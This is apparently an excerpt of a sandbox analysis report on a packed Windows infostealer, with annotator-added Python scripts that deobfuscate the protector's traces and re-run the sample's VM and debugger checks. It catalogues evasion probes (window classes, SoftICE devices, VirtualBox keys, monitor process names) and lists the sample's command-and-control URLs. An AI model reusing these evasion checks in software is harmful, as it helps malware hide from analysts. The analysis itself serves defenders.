Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7230833 second address: 7230844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp ecx, 01h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e movsx edx, cx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7230844 second address: 7230848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7230848 second address: 72308A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx esi, dx 0x00000009 popad 0x0000000a jne 00007F769119FBC2h 0x00000010 pushad 0x00000011 mov esi, edx 0x00000013 mov cl, dh 0x00000015 popad 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F7620C9DE57h 0x00000020 sub ah, 0000006Eh 0x00000023 jmp 00007F7620C9DE59h 0x00000028 popfd 0x00000029 jmp 00007F7620C9DE50h 0x0000002e popad 0x0000002f rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 72308A8 second address: 72308F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC87Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F7620BAC884h 0x00000011 xor ax, 5D48h 0x00000016 jmp 00007F7620BAC87Bh 0x0000001b popfd 0x0000001c movzx eax, dx 0x0000001f popad 0x00000020 pop ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F7620BAC87Eh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 72001DB second address: 7200293 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F7620C9DE4Dh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F7620C9DE4Eh 0x00000013 push eax 0x00000014 pushad 0x00000015 push esi 0x00000016 push ebx 0x00000017 pop ecx 0x00000018 pop edi 0x00000019 popad 0x0000001a xchg eax, ebp 0x0000001b jmp 00007F7620C9DE52h 0x00000020 mov ebp, esp 0x00000022 pushad 0x00000023 mov ecx, 2AE5920Dh 0x00000028 call 00007F7620C9DE4Ah 0x0000002d pushad 0x0000002e popad 0x0000002f pop ecx 0x00000030 popad 0x00000031 push eax 0x00000032 jmp 00007F7620C9DE4Ch 0x00000037 mov dword ptr [esp], ecx 0x0000003a pushad 0x0000003b movzx eax, bx 0x0000003e pushfd 0x0000003f jmp 00007F7620C9DE53h 0x00000044 xor al, 0000001Eh 0x00000047 jmp 00007F7620C9DE59h 0x0000004c popfd 0x0000004d popad 0x0000004e push 00000000h 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007F7620C9DE58h 0x00000059 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7200293 second address: 72002A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC87Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 72002A2 second address: 72002C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE59h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 00000000h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 72002C7 second address: 72002CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 72002CB second address: 72002DE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620C9DE4Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 72002DE second address: 7200304 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 1Bh 0x00000005 movzx esi, dx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push dword ptr [ebp+08h] 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F7620BAC886h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7200335 second address: 720033B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 720033B second address: 720033F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7200011 second address: 7200016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7200016 second address: 7200060 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC881h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F7620BAC87Eh 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F7620BAC87Ch 0x00000019 sub ecx, 78E66478h 0x0000001f jmp 00007F7620BAC87Bh 0x00000024 popfd 0x00000025 pushad 0x00000026 popad 0x00000027 popad 0x00000028 rdtsc
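
The interceptor fragments above are the protector's mutated code rather than a plain timing check (the memory strings further down name Oreans.vxd and Software\WinLicense, so the binary is wrapped in Oreans' WinLicense). Each fragment runs from one executed rdtsc to the next, and what sits between is mostly pushad/popad scratch work, forward jumps over garbage bytes and push/pop brackets. The script below is an added example, not Joe Sandbox output and not code from the sample: it joins abutting fragments and strips that junk so that the instructions which still do something remain. It rests on three assumptions, each of which holds for every fragment listed above: the listing is an execution trace, so the instruction after an unconditional jmp is the one it landed on; a pushad/popad or pushfd/popfd block contains only register scratch work that popad/popfd throws away; and a push eax / push edx ... pop edx / pop eax bracket restores both registers, so an rdtsc inside it contributes nothing. The seven fragments 7230788 through 72308F4 are embedded as the sample input.

```python
"""Strip mutation-engine junk out of Joe Sandbox "RDTSC instruction interceptor" lines.

Added example for this report; not Joe Sandbox output, not code recovered from the
sample.  Assumptions (all true of the fragments in the report): the listing is an
execution trace, pushad/popad and pushfd/popfd blocks hold only register scratch
work, and push eax/push edx ... pop edx/pop eax around an rdtsc discards its result.
"""
import re

LINE_RE = re.compile(
    r"First address: ([0-9A-Fa-f]+) second address: ([0-9A-Fa-f]+) instructions: (.*)$"
)
SPLIT_RE = re.compile(r"\s*0x[0-9A-Fa-f]{8}\s+")      # the per-instruction byte offsets
SAVE, RESTORE = ["push eax", "push edx"], ["pop edx", "pop eax"]

# Constructed input: the seven fragments 7230788 -> 72308F4 copied from this report.
SAMPLE = [
    r"Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7230788 second address: 7230829 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, 00000001h 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F7620BAC889h 0x00000014 add ax, 94B6h 0x00000019 jmp 00007F7620BAC881h 0x0000001e popfd 0x0000001f movzx eax, bx 0x00000022 popad 0x00000023 lock cmpxchg dword ptr [esi], ecx 0x00000027 pushad 0x00000028 pushfd 0x00000029 jmp 00007F7620BAC884h 0x0000002e sbb ch, 00000008h 0x00000031 jmp 00007F7620BAC87Bh 0x00000036 popfd 0x00000037 popad 0x00000038 mov ecx, eax 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d pushfd 0x0000003e jmp 00007F7620BAC87Bh 0x00000043 sub ax, 6F4Eh 0x00000048 jmp 00007F7620BAC889h 0x0000004d popfd 0x0000004e mov dx, si 0x00000051 popad 0x00000052 rdtsc",
    r"Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7230829 second address: 723082F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc",
    r"Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 723082F second address: 7230833 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc",
    r"Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7230833 second address: 7230844 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp ecx, 01h 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e movsx edx, cx 0x00000011 rdtsc",
    r"Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7230844 second address: 7230848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc",
    r"Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 7230848 second address: 72308A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 movzx esi, dx 0x00000009 popad 0x0000000a jne 00007F769119FBC2h 0x00000010 pushad 0x00000011 mov esi, edx 0x00000013 mov cl, dh 0x00000015 popad 0x00000016 pop edi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F7620C9DE57h 0x00000020 sub ah, 0000006Eh 0x00000023 jmp 00007F7620C9DE59h 0x00000028 popfd 0x00000029 jmp 00007F7620C9DE50h 0x0000002e popad 0x0000002f rdtsc",
    r"Source: C:\Users\user\Desktop\ZN34wF8WI2.exeRDTSC instruction interceptor: First address: 72308A8 second address: 72308F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F7620BAC87Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F7620BAC884h 0x00000011 xor ax, 5D48h 0x00000016 jmp 00007F7620BAC87Bh 0x0000001b popfd 0x0000001c movzx eax, dx 0x0000001f popad 0x00000020 pop ebx 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F7620BAC87Eh 0x00000028 rdtsc",
]


def parse_fragment(line):
    """(first, second, [instruction, ...]) for one interceptor line, else None."""
    m = LINE_RE.search(line)
    if not m:
        return None
    first, second, body = m.groups()
    insns = [t.strip() for t in SPLIT_RE.split(body) if t.strip()]
    return first.upper(), second.upper(), insns


def chain_fragments(lines):
    """Join fragments whose addresses abut.  The rdtsc that closes one fragment is
    the same instruction that opens the next, so it is kept only once."""
    chains, by_tail = [], {}                          # [head, tail, stream], tail -> index
    for line in lines:
        parsed = parse_fragment(line)
        if parsed is None:
            continue
        first, second, insns = parsed
        if first in by_tail:
            idx = by_tail.pop(first)
            chains[idx][1] = second
            chains[idx][2].extend(insns[1:])
        else:
            idx = len(chains)
            chains.append([first, second, list(insns)])
        by_tail[second] = idx
    return [tuple(c) for c in chains]


def simplify(stream):
    """Drop the junk and return the instructions that still have an effect."""
    out, regs, flags = [], 0, 0                       # pushad/popad and pushfd/popfd depth
    for insn in stream:
        mnem = insn.split()[0]
        if mnem == "pushad":
            regs += 1
        elif mnem == "popad":
            regs = max(regs - 1, 0)
        elif mnem == "pushfd":
            flags += 1
        elif mnem == "popfd":
            flags = max(flags - 1, 0)
        elif regs or flags or mnem == "jmp":
            pass                                      # scratch work, or a hop over garbage bytes
        else:
            out.append(insn)
            if out[-2:] == RESTORE:                   # cancel a save/restore bracket ...
                if out[-5:-2] == SAVE + ["rdtsc"]:    # ... around an rdtsc whose result dies here
                    del out[-5:]
                elif out[-4:-2] == SAVE:              # ... or around nothing at all
                    del out[-4:]
    return out


def deobfuscate(lines):
    """[(head, tail, core_instructions), ...] for every chain found in the lines."""
    return [(head, tail, simplify(stream)) for head, tail, stream in chain_fragments(lines)]


if __name__ == "__main__":
    for head, tail, core in deobfuscate(SAMPLE):
        print(f"{head} -> {tail}:")
        for insn in core:
            print("    " + insn)
```

On that chain every rdtsc whose bracket lies inside the joined stream cancels out; what survives is mov eax, 1 / lock cmpxchg dword ptr [esi], ecx / mov ecx, eax / cmp ecx, 01h / jne, a spin on an interlocked compare-exchange, followed by the pop edi / pop esi / pop ebx epilogue. No timestamp delta is computed anywhere in the chain, so the "RDTSC time measurement" signature is reacting to the mutation engine's choice of filler instruction in these fragments; the separate rdtsc in function 5_2_005F9980 is not covered by them and still deserves a look. The leading rdtsc with its pops and the trailing push/push/rdtsc are the halves of brackets whose partner lies in the fragments before and after the ones fed in.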
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Special instruction interceptor: First address: B5E0BA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Special instruction interceptor: First address: D28A81 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Special instruction interceptor: First address: B60CAB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Special instruction interceptor: First address: D93572 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc (the display-adapter device class, i.e. the name of the first video driver)
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: 5_2_005F9980 rdtsc
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: 5_2_0041255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: 5_2_004129FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle
Source: ZN34wF8WI2.exe, ZN34wF8WI2.exe, 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: ZN34wF8WI2.exe | Binary or memory string: Hyper-V RAW (the Winsock provider name from mswsock.dll, present on any Windows 10 host, so not a VM indicator on its own)
Source: ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed. (one contiguous string table: the field names of the host fingerprint the sample builds, the VirtualBox and debugger checks it runs, and the Uninstall keys it walks for installed applications)
Source: ZN34wF8WI2.exe, 00000005.00000003.1307940192.0000000006A61000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlQ=
Source: ZN34wF8WI2.exe, 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please, (Oreans.vxd and Software\WinLicense are the runtime strings of the Oreans WinLicense protector, so this VBOX__ check belongs to the packer, not necessarily to the payload)
Source: ZN34wF8WI2.exe, 00000005.00000002.1416988934.0000000001A3C000.00000004.00000020.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000003.1395398703.0000000001A3B000.00000004.00000020.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000003.1394903835.0000000001A36000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | File opened: NTICE (SoftICE kernel-debugger device name)
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | File opened: SICE (SoftICE kernel-debugger device name)
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | File opened: SIWVID (SoftICE kernel-debugger device name)
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Process queried: DebugPort (three times)
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Code function: 5_2_005F9980 rdtsc
Source: ZN34wF8WI2.exe, ZN34wF8WI2.exe, 00000005.00000002.1415906547.0000000000CE0000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: V;Program Manager
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation (four times)
Source: C:\Users\user\Desktop\ZN34wF8WI2.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: ZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: procmon.exe
Source: ZN34wF8WI2.exe, 00000005.00000003.1281790012.00000000074BF000.00000004.00001000.00020000.00000000.sdmp, ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: wireshark.exe
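
Taken together, the sandbox-evasion lines above and the anti-debugging lines in this section enumerate exactly what the sample looks for before it runs: eight window class/title strings, three SoftICE device names, the VirtualBox ACPI and VBoxSF registry keys and the VBox*.dll glob from its string table, the BIOS and display-driver registry values, and five debugger/monitor process names. The script below is an added example, written once for both passages; it is not Joe Sandbox output and not code recovered from the sample. It re-runs those probes on the Windows host you intend to detonate the sample on and reports which ones would trip, so the analysis VM can be fixed before the detonation rather than after an empty run. Assumed rather than read from the report: the Win32 call shapes (FindWindowW, CreateFileW, winreg, tasklist) used to reproduce each check, and the VBOX/VIRTUALBOX substrings used to judge the BIOS and driver strings. The tasklist output embedded for the offline test is constructed.

```python
"""Re-run the anti-analysis probes this report attributes to ZN34wF8WI2.exe on the host
you intend to detonate it on.

Added example for this report; not Joe Sandbox output, not code from the sample.
Probes mirror the report's observations; the Win32 call shapes and the VM_MARKERS
substrings are assumptions of this example.  flagged_processes() and verdict() are
pure and run anywhere; the probe_* functions need Windows.
"""
import csv
import ctypes
import glob
import io
import subprocess
import sys

WINDOW_STRINGS = [            # as printed in the report; FindWindow matches case-insensitively
    "regmonclass", "gbdyllo", "process monitor - sysinternals: www.sysinternals.com",
    "procmon_window_class", "registry monitor - sysinternals: www.sysinternals.com",
    "ollydbg", "filemonclass", "file monitor - sysinternals: www.sysinternals.com",
]
DEVICE_NAMES = ["NTICE", "SICE", "SIWVID"]             # SoftICE-era debugger devices
VBOX_KEYS = [r"HARDWARE\ACPI\DSDT\VBOX__", r"SYSTEM\ControlSet001\Services\VBoxSF"]
FINGERPRINT_VALUES = [
    (r"HARDWARE\DESCRIPTION\System", "SystemBiosVersion"),
    (r"HARDWARE\DESCRIPTION\System", "VideoBiosVersion"),
    (r"SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000",
     "DriverDesc"),
]
VM_MARKERS = ("VBOX", "VIRTUALBOX")                    # assumption: what a VBOX__ check wants
PROCESS_NAMES = {"WINDBG.EXE", "WIRESHARK.EXE", "PROCMON.EXE", "X64DBG.EXE", "IDA.EXE"}
VBOX_DLL_GLOB = r"C:\Windows\System32\VBox*.dll"

# Constructed `tasklist /FO CSV /NH` output for the offline test of the parser.
SAMPLE_TASKLIST = (
    '"System Idle Process","0","Services","0","8 K"\n'
    '"procmon.exe","4120","Console","1","61,244 K"\n'
    '"explorer.exe","3320","Console","1","120,000 K"\n'
)


def _require_windows():
    if sys.platform != "win32":
        raise RuntimeError("host probes need Windows; flagged_processes/verdict run anywhere")


def probe_windows():
    """Window class/title strings that currently resolve to a window."""
    _require_windows()
    u32 = ctypes.windll.user32
    u32.FindWindowW.restype = ctypes.c_void_p
    u32.FindWindowW.argtypes = [ctypes.c_wchar_p, ctypes.c_wchar_p]
    return [s for s in WINDOW_STRINGS if u32.FindWindowW(s, None) or u32.FindWindowW(None, s)]


def probe_devices():
    """Device names that open successfully (a kernel-debugger driver is loaded)."""
    _require_windows()
    k32 = ctypes.windll.kernel32
    k32.CreateFileW.restype = ctypes.c_void_p
    k32.CreateFileW.argtypes = [ctypes.c_wchar_p, ctypes.c_uint32, ctypes.c_uint32, ctypes.c_void_p,
                                ctypes.c_uint32, ctypes.c_uint32, ctypes.c_void_p]
    k32.CloseHandle.argtypes = [ctypes.c_void_p]
    invalid = ctypes.c_void_p(-1).value                # INVALID_HANDLE_VALUE
    hits = []
    for name in DEVICE_NAMES:
        # GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_WRITE, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL
        handle = k32.CreateFileW("\\\\.\\" + name, 0x80000000, 0x3, None, 3, 0x80, None)
        if handle is not None and handle != invalid:
            k32.CloseHandle(handle)
            hits.append(name)
    return hits


def probe_registry():
    """VirtualBox keys that exist, plus BIOS/driver values that name VirtualBox."""
    _require_windows()
    import winreg
    hits = []
    for key in VBOX_KEYS:
        try:
            winreg.CloseKey(winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key))
            hits.append(key)
        except OSError:
            pass
    for key, value in FINGERPRINT_VALUES:
        try:
            with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, key) as k:
                data, _ = winreg.QueryValueEx(k, value)
        except OSError:
            continue
        text = " ".join(data) if isinstance(data, list) else str(data)   # REG_MULTI_SZ is a list
        if any(marker in text.upper() for marker in VM_MARKERS):
            hits.append(f"{key}\\{value} = {text!r}")
    return hits


def flagged_processes(tasklist_csv):
    """Image names in `tasklist /FO CSV /NH` output that the sample looks for,
    compared case-folded as its CharUpperA call suggests."""
    names = {row[0].upper() for row in csv.reader(io.StringIO(tasklist_csv)) if row}
    return sorted(names & PROCESS_NAMES)


def probe_processes():
    _require_windows()
    out = subprocess.run(["tasklist", "/FO", "CSV", "/NH"], capture_output=True,
                         text=True, check=True).stdout
    return flagged_processes(out)


def run_all():
    return {
        "window": probe_windows(),
        "device": probe_devices(),
        "registry": probe_registry(),
        "vbox_dll": glob.glob(VBOX_DLL_GLOB),
        "process": probe_processes(),
    }


def verdict(results):
    """Probe categories with at least one hit, i.e. what this host would give away."""
    return sorted(category for category, hits in results.items() if hits)


if __name__ == "__main__":
    results = run_all()
    for category, hits in results.items():
        print(f"{category:9s} {hits}")
    print("tripped:", ", ".join(verdict(results)) or "none")
```

Run it as the same user the sample will run as; the window and process probes only see what that session sees. A clean result does not make the VM invisible (the sample also fingerprints CPU count, RAM, uptime and recent files, which this script does not judge), but any category it lists is one the sample demonstrably checks.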

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.7:49705 -> 91.149.241.220:80
MITRE ATT&CK matrix: techniques with signature hits, hit count in parentheses. The matrix's unmatched placeholder cells are omitted; Reconnaissance, Resource Development, Initial Access, Credential Access, Exfiltration and Impact have no hits.

Execution: Command and Scripting Interpreter (2)
Persistence: DLL Side-Loading (1)
Privilege Escalation: DLL Side-Loading (1), Process Injection (1)
Defense Evasion: Virtualization/Sandbox Evasion (23), Software Packing (12), Obfuscated Files or Information (3), Process Injection (1), Deobfuscate/Decode Files or Information (1), DLL Side-Loading (1)
Discovery: Security Software Discovery (751), System Information Discovery (216), Virtualization/Sandbox Evasion (23), Process Discovery (13), Remote System Discovery (1), File and Directory Discovery (1)
Lateral Movement: Exploitation of Remote Services (1)
Collection: Archive Collected Data (11), Data from Local System (1)
Command and Control: Encrypted Channel (11), Application Layer Protocol (5), Ingress Tool Transfer (4), Non-Application Layer Protocol (4)

Antivirus detection, submitted sample (Source | Detection | Scanner | Label)

ZN34wF8WI2.exe | 47% | ReversingLabs | Win32.Infostealer.Tinba
ZN34wF8WI2.exe | 51% | Virustotal | (link)
ZN34wF8WI2.exe | 100% | Avira | TR/Crypt.TPM.Gen
ZN34wF8WI2.exe | 100% | Joe Sandbox ML |
No Antivirus matches
Antivirus detection, URLs (Source | Detection | Scanner | Label). Avira URL Cloud rated every variant of the C2 URL "safe" with 0% detection at analysis time, while the sandbox itself marks the URL malicious in the URL table below; the reputation column is no reason to treat home.fortth14vs.top as benign.

http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb173553773835a1 | 0% | Avira URL Cloud | safe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738http://home.fortth14vs.top/gduZhxVRrNSTmMah | 0% | Avira URL Cloud | safe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb18 | 0% | Avira URL Cloud | safe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738 | 0% | Avira URL Cloud | safe
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0 | 0% | Avira URL Cloud | safe
http://home.fortth14vs.top/gduZ | 0% | Avira URL Cloud | safe
Domains (Name | IP | Active | Malicious | Antivirus Detection | Reputation)

home.fortth14vs.top | 91.149.241.220 | true | false | | high
httpbin.org | 34.197.122.172 | true | false | | high
URLs contacted (Name | Malicious | Antivirus Detection | Reputation)

http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738?argument=0 | true | Avira URL Cloud: safe | unknown
http://home.fortth14vs.top/gduZhxVRrNSTmMahdBGb1735537738 | true | Avira URL Cloud: safe | unknown
https://httpbin.org/ip | false | | high
URLs found in memory or binary data (Name | Source | Malicious | Antivirus Detection | Reputation). The curl.se entries are the cache-file banners libcurl writes for its HSTS, Alt-Svc and cookie stores, which means the sample links libcurl statically; https://httpbin.org/ip is a public what-is-my-IP service the sample uses to learn the victim's external address.

https://curl.se/docs/hsts.html | ZN34wF8WI2.exe, 00000005.00000002.1415376531.00000000009F0000.00000040.00000001.01000000.00000004.sdmp | false | | high
